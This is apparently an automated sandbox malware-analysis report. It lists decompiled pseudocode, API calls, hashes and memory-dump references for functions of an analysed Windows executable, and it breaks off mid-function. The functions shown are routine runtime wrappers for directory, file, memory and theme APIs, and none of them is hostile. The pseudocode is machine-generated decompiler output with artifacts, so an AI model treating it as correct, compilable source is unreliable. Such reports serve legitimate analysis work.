Opcode ID: 39ed601fec6ab7f73062d47eae4b79688b207d415561d85b0c36b11bf5f2fc16
Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
Opcode Fuzzy Hash: 39ed601fec6ab7f73062d47eae4b79688b207d415561d85b0c36b11bf5f2fc16
Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C

Uniqueness

Uniqueness Score: -1.00%

Function 00407288 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407288(void* __eax) {
				signed int _t4;

				_t4 = SetCurrentDirectoryA(E00403738(__eax)); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

0x00407293
0x0040729a
0x0040729f

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,004960B6,00000000,00496289,?,?,00000005,00000000,004962BD,?,?,00000000), ref: 00407293

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: ed1ea361e46f82de3300f70bff64bec8ccf886368909cfc5f5d620eac69d27dc
Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
Opcode Fuzzy Hash: ed1ea361e46f82de3300f70bff64bec8ccf886368909cfc5f5d620eac69d27dc
Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514

Uniqueness

Uniqueness Score: -1.00%

Function 0044FC8C Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044FC8C(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E0044FA14( *_t7);
				}
				return _t4;
			}

0x0044fc8d
0x0044fc93
0x0044fc9a
0x00000000
0x0044fc9e
0x0044fca4

APIs

SetEndOfFile.KERNEL32(?,?,0045B6DE,00000000,0045B869,?,00000000,00000002,00000002), ref: 0044FC93

Part of subcall function 0044FA14: GetLastError.KERNEL32(0044F830,0044FAD6,?,00000000,?,00496128,00000001,00000000,00000002,00000000,00496289,?,?,00000005,00000000,004962BD), ref: 0044FA17

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: e3cf67ab4b6e40e7819944c2f6f380abdb95ad3600b9c69ef1af1eeb7ca1aef4
Instruction ID: 7cad1cb3ee1d8c7f2b9b2e251431728f1ca512253c074887a732f5b9ba6e5bcc
Opcode Fuzzy Hash: e3cf67ab4b6e40e7819944c2f6f380abdb95ad3600b9c69ef1af1eeb7ca1aef4
Instruction Fuzzy Hash: 98C04CA1700500479F00EABE95C1A0763D86E492093154076B908DF206D7A9D8044A64

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2EF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042E2EF() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0042E30D);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x0042e2f1
0x0042e2f4
0x0042e2f7
0x0042e300
0x0042e305

APIs

SetErrorMode.KERNEL32(?,0042E30D), ref: 0042E300

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c4c75b97e794bf3e7428fda086cab8c8c6a3d736d300e5b7c1b12c9a84fa82a5
Instruction ID: 5e1f02edd2daef0d1c6838a3ccb2c9194eea22d206507ab6d3fb1b5250f91bea
Opcode Fuzzy Hash: c4c75b97e794bf3e7428fda086cab8c8c6a3d736d300e5b7c1b12c9a84fa82a5
Instruction Fuzzy Hash: F4B09B7670C6005EF705D695B45552D63D4D7C57203E14577F450D3580D53D58004D18

Uniqueness

Uniqueness Score: -1.00%

Function 004165D4 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004165D4(void* __eax) {
				intOrPtr _t3;

				_t3 =  *((intOrPtr*)(__eax + 0xc0));
				_push(_t3); // executed
				L00405E44(); // executed
				return _t3;
			}

0x004165d4
0x004165da
0x004165db
0x004165e0

APIs

740C9840.USER32(?), ref: 004165DB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: C9840
String ID:
API String ID: 3822654940-0
Opcode ID: 44ecf8186006021e48ec6b00d8ed6ef047871ac83faf9ae2e4627fb7c2bd5016
Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
Opcode Fuzzy Hash: 44ecf8186006021e48ec6b00d8ed6ef047871ac83faf9ae2e4627fb7c2bd5016
Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58

Uniqueness

Uniqueness Score: -1.00%

Function 00447D60 Relevance: 1.4, APIs: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00447D60(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v21;
				signed int _v28;
				void* _t63;
				void* _t98;
				char _t108;
				char _t112;
				void* _t113;
				char _t114;
				intOrPtr _t138;
				intOrPtr _t147;
				intOrPtr _t150;
				char _t153;
				void* _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t160;

				_t160 = __fp0;
				_t155 = _t156;
				_t157 = _t156 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_t150 = _a4;
				_push(_t155);
				_push(0x447f40);
				_push( *[fs:eax]);
				 *[fs:eax] = _t157;
				if( *((intOrPtr*)(_v12 + 0xc)) == 0) {
					__eflags =  *((intOrPtr*)(_v12 + 8));
					if(__eflags != 0) {
						L5:
						E00403494( &_v28,  *((intOrPtr*)(_v12 + 0x18)));
						E004037B8( &_v28, E0040385C(0x447f5c, _v28), 1);
						E004037B8( &_v28, E0040385C(0x447f5c, _v28), 1);
						_t63 = E00403574(_v28);
						__eflags = _t63 - 2;
						if(_t63 >= 2) {
							_v21 =  *_v28;
							E004037B8( &_v28, 3, 1);
							_t153 =  *((intOrPtr*)(_t150 + 0xc)) - E00403574(_v28);
							__eflags =  *_v28;
							if( *_v28 == 0) {
								_t153 = _t153 + 1;
								__eflags = _t153;
							}
							_v16 = E00431208(1, _t150);
							_t112 = E00403574(_v28) - 2;
							__eflags = _t112;
							if(_t112 >= 0) {
								_t114 = _t112 + 1;
								__eflags = _t114;
								do {
									E004312D8(_v16, 0, _t150);
									_t114 = _t114 - 1;
									__eflags = _t114;
								} while (_t114 != 0);
							}
							_t113 = E00403574(_v28);
							__eflags = _t113 - 2;
							if(_t113 >= 2) {
								do {
									_t98 = E004465F4(_t150, _t153);
									__eflags =  *((char*)(_v28 + _t113 - 1));
									E004313E0(_v16, E00442C08(_t98, _v28 & 0xffffff00 |  *((char*)(_v28 + _t113 - 1)) != 0x00000000), _t113 - 2);
									_t153 = _t153 + 1;
									_t113 = _t113 - 1;
									__eflags = _t113 - 1;
								} while (_t113 != 1);
							}
							__eflags =  *_v28;
							if( *_v28 == 0) {
								__eflags = 0;
								_v20 = 0;
							} else {
								_v20 = E00442C08(E004465F4(_t150, _t153), 1);
							}
							_push(_t155);
							_push(0x447f21);
							_push( *[fs:eax]);
							 *[fs:eax] = _t157;
							E0044196C(_v8, _t113,  *((intOrPtr*)(_v12 + 8)), 0, _t150, _t153, _t160, _v20, _v16, 0); // executed
							E00447AF8(_v8, GetLastError(), __eflags);
							__eflags = 0;
							_pop(_t138);
							 *[fs:eax] = _t138;
							_push(0x447f28);
							E00442C48(_v20);
							return E00442C58(_v16);
						} else {
							goto L18;
						}
					} else {
						_t108 = E00447B64(_v8, 0, _v12, _t150, __esi, __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L5;
						} else {
							goto L18;
						}
					}
				} else {
					L18:
					_pop(_t147);
					 *[fs:eax] = _t147;
					_push(0x447f47);
					return E00403400( &_v28);
				}
			}

0x00447d60
0x00447d61
0x00447d63
0x00447d66
0x00447d67
0x00447d68
0x00447d6b
0x00447d6e
0x00447d71
0x00447d74
0x00447d79
0x00447d7a
0x00447d7f
0x00447d82
0x00447d8c
0x00447d98
0x00447d9c
0x00447db4
0x00447dbd
0x00447dd9
0x00447df5
0x00447dfd
0x00447e02
0x00447e05
0x00447e13
0x00447e23
0x00447e33
0x00447e38
0x00447e3b
0x00447e3d
0x00447e3d
0x00447e3d
0x00447e4a
0x00447e57
0x00447e57
0x00447e5a
0x00447e5c
0x00447e5c
0x00447e5d
0x00447e62
0x00447e67
0x00447e67
0x00447e67
0x00447e5d
0x00447e72
0x00447e74
0x00447e77
0x00447e79
0x00447e7d
0x00447e85
0x00447e9c
0x00447ea1
0x00447ea2
0x00447ea3
0x00447ea3
0x00447e79
0x00447eab
0x00447eae
0x00447ec5
0x00447ec7
0x00447eb0
0x00447ec0
0x00447ec0
0x00447ecc
0x00447ecd
0x00447ed2
0x00447ed5
0x00447eef
0x00447efe
0x00447f03
0x00447f05
0x00447f08
0x00447f0b
0x00447f13
0x00447f20
0x00447e07
0x00000000
0x00447e07
0x00447d9e
0x00447da4
0x00447da9
0x00447dab
0x00000000
0x00447dad
0x00000000
0x00447dad
0x00447dab
0x00447d8e
0x00447f2a
0x00447f2c
0x00447f2f
0x00447f32
0x00447f3f
0x00447f3f

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65547403e8f215fbf5a25dde61a37f8b0d4946ff647b416eee81b3bcb1e07b01
Instruction ID: 6c155f0bab6c330936d6c04dbdbc89a39021285a810b44ae9db73128b74bc4e5
Opcode Fuzzy Hash: 65547403e8f215fbf5a25dde61a37f8b0d4946ff647b416eee81b3bcb1e07b01
Instruction Fuzzy Hash: 8751A774E042459FDB01EFA9C482AAEBBF5EF49304F6041BAE504E7351D7389D46CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401678 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401678(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49a440; // 0x77099c
				while(_t29 != 0x49a440) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x0040167f
0x00401683
0x0040168a
0x0040169f
0x004016a7
0x004016ad
0x004016b3
0x004016b6
0x004016fa
0x004016be
0x004016c4
0x004016c8
0x004016ca
0x004016ca
0x004016d0
0x004016d2
0x004016d2
0x004016d8
0x004016e5
0x004016ec
0x004016ee
0x004016f4
0x00000000
0x004016f4
0x004016ec
0x004016f8
0x004016f8
0x00401709

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016E5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
Instruction ID: a6e7c4f6b24507bbfa1b5e3bb33a91ffb91a5c0164af84241c7500694563929a
Opcode Fuzzy Hash: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
Instruction Fuzzy Hash: 3D11C272A057019FC3108F19CC80A2BB7E5EFC4364F09C93DE598673A4D735AC409789

Uniqueness

Uniqueness Score: -1.00%

Function 0041F3AC Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F3AC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49a650 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x49a64c; // 0x2360000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402738(0x498594, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041F3A4(_t2, E0041F384);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041F3A4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49a650;
						 *0x49a650 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49a64c = _t35;
				}
				_t25 =  *0x49a650;
				_t8 = _t25 + 5; // 0xb4004105
				 *0x49a650 =  *_t8;
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49a650;
			}

0x0041f3ba
0x0041f3ca
0x0041f3cf
0x0041f3d1
0x0041f3d6
0x0041f3d8
0x0041f3e5
0x0041f3ef
0x0041f3f7
0x0041f3fa
0x0041f3fa
0x0041f3fd
0x0041f3fd
0x0041f400
0x0041f40a
0x0041f40f
0x0041f412
0x0041f414
0x0041f41b
0x0041f422
0x0041f422
0x0041f42a
0x0041f42c
0x0041f42f
0x0041f434
0x0041f43a
0x0041f441

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED8C,?,00423877,00423BF4,0041ED8C), ref: 0041F3CA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c353852e02813b7d23fb318ffadc6e7b05784c4f0baf16d7202792417fe2c6e1
Instruction ID: 062ef65fd22a162953b0f92c10ce6b15da8806ec6157442b2226c44539e8a6c2
Opcode Fuzzy Hash: c353852e02813b7d23fb318ffadc6e7b05784c4f0baf16d7202792417fe2c6e1
Instruction Fuzzy Hash: C0111C742403059BD710DF19C881B86FBE5EF98350B14C53BE9A88B385D374E959CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00452324 Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00452324(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				intOrPtr _v8;
				char _v16;
				long _v20;
				intOrPtr _t17;
				intOrPtr _t33;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff0;
				if(E00451A84( *((intOrPtr*)(__eax + 0xc)),  &_v16) != 0) {
					_push(_t41);
					_push(0x45238d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t17 = E0044FB24(__ecx, __edx, 0, 0); // executed
					_v8 = _t17;
					_v20 = GetLastError();
					_pop(_t33);
					 *[fs:eax] = _t33;
					_push(0x452394);
					return E00451AC0( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}

0x00452325
0x00452327
0x00452340
0x0045234d
0x0045234e
0x00452353
0x00452356
0x00452367
0x0045236c
0x00452374
0x00452379
0x0045237c
0x0045237f
0x0045238c
0x00452342
0x00452342
0x004523a6
0x004523a6

APIs

GetLastError.KERNEL32(00000000,0045238D), ref: 0045236F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 1bd9aba7eae3ea747001b5beb64755777936e061a820bd5cd2ee0a64b3f9739e
Instruction ID: 5c1c835d6c8d6233c25c25fd279844ad9956aa32c1227f0d88fcdaa3ae4b5161
Opcode Fuzzy Hash: 1bd9aba7eae3ea747001b5beb64755777936e061a820bd5cd2ee0a64b3f9739e
Instruction Fuzzy Hash: 9E0170356046486F8B11DF799C014EEF7E8DB4B32072082B7FC24C3742D6784D059664

Uniqueness

Uniqueness Score: -1.00%

Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040170C(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x49a440; // 0x77099c
				while(_t19 != 0x49a440) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x49a41c = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x00401710
0x00401721
0x00401728
0x00401731
0x00401735
0x00401738
0x0040173b
0x0040177b
0x00401743
0x00401749
0x0040174e
0x00401750
0x00401750
0x00401755
0x00401757
0x00401757
0x0040175b
0x00401766
0x0040176d
0x0040176f
0x0040176f
0x0040176d
0x00401779
0x00401779
0x00401788

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,0000200C,0000600F,00401973), ref: 00401766

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406F28 Relevance: 1.3, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F28(void* __eax) {
				int _t2;

				_t2 = CloseHandle(__eax); // executed
				return _t2;
			}

0x00406f29
0x00406f2e

APIs

CloseHandle.KERNEL32 ref: 00406F29

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bec4b004c9ec3835cc6d5cceb13c952cfe3ce374858cd586c79afcccbb6494d8
Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
Opcode Fuzzy Hash: bec4b004c9ec3835cc6d5cceb13c952cfe3ce374858cd586c79afcccbb6494d8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0044AC90 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044AC90() {
				signed int _t3;

				 *0x49a760 =  *0x49a760 + 1;
				if( *0x49a75c == 0) {
					_t3 = E0044AC3C();
					if(_t3 != 0) {
						_t3 = LoadLibraryA("uxtheme.dll");
						 *0x49a75c = _t3;
						if( *0x49a75c != 0) {
							 *0x49a6a0 = GetProcAddress( *0x49a75c, "OpenThemeData");
							 *0x49a6a4 = GetProcAddress( *0x49a75c, "CloseThemeData");
							 *0x49a6a8 = GetProcAddress( *0x49a75c, "DrawThemeBackground");
							 *0x49a6ac = GetProcAddress( *0x49a75c, "DrawThemeText");
							 *0x49a6b0 = GetProcAddress( *0x49a75c, "GetThemeBackgroundContentRect");
							 *0x49a6b4 = GetProcAddress( *0x49a75c, "GetThemeBackgroundContentRect");
							 *0x49a6b8 = GetProcAddress( *0x49a75c, "GetThemePartSize");
							 *0x49a6bc = GetProcAddress( *0x49a75c, "GetThemeTextExtent");
							 *0x49a6c0 = GetProcAddress( *0x49a75c, "GetThemeTextMetrics");
							 *0x49a6c4 = GetProcAddress( *0x49a75c, "GetThemeBackgroundRegion");
							 *0x49a6c8 = GetProcAddress( *0x49a75c, "HitTestThemeBackground");
							 *0x49a6cc = GetProcAddress( *0x49a75c, "DrawThemeEdge");
							 *0x49a6d0 = GetProcAddress( *0x49a75c, "DrawThemeIcon");
							 *0x49a6d4 = GetProcAddress( *0x49a75c, "IsThemePartDefined");
							 *0x49a6d8 = GetProcAddress( *0x49a75c, "IsThemeBackgroundPartiallyTransparent");
							 *0x49a6dc = GetProcAddress( *0x49a75c, "GetThemeColor");
							 *0x49a6e0 = GetProcAddress( *0x49a75c, "GetThemeMetric");
							 *0x49a6e4 = GetProcAddress( *0x49a75c, "GetThemeString");
							 *0x49a6e8 = GetProcAddress( *0x49a75c, "GetThemeBool");
							 *0x49a6ec = GetProcAddress( *0x49a75c, "GetThemeInt");
							 *0x49a6f0 = GetProcAddress( *0x49a75c, "GetThemeEnumValue");
							 *0x49a6f4 = GetProcAddress( *0x49a75c, "GetThemePosition");
							 *0x49a6f8 = GetProcAddress( *0x49a75c, "GetThemeFont");
							 *0x49a6fc = GetProcAddress( *0x49a75c, "GetThemeRect");
							 *0x49a700 = GetProcAddress( *0x49a75c, "GetThemeMargins");
							 *0x49a704 = GetProcAddress( *0x49a75c, "GetThemeIntList");
							 *0x49a708 = GetProcAddress( *0x49a75c, "GetThemePropertyOrigin");
							 *0x49a70c = GetProcAddress( *0x49a75c, "SetWindowTheme");
							 *0x49a710 = GetProcAddress( *0x49a75c, "GetThemeFilename");
							 *0x49a714 = GetProcAddress( *0x49a75c, "GetThemeSysColor");
							 *0x49a718 = GetProcAddress( *0x49a75c, "GetThemeSysColorBrush");
							 *0x49a71c = GetProcAddress( *0x49a75c, "GetThemeSysBool");
							 *0x49a720 = GetProcAddress( *0x49a75c, "GetThemeSysSize");
							 *0x49a724 = GetProcAddress( *0x49a75c, "GetThemeSysFont");
							 *0x49a728 = GetProcAddress( *0x49a75c, "GetThemeSysString");
							 *0x49a72c = GetProcAddress( *0x49a75c, "GetThemeSysInt");
							 *0x49a730 = GetProcAddress( *0x49a75c, "IsThemeActive");
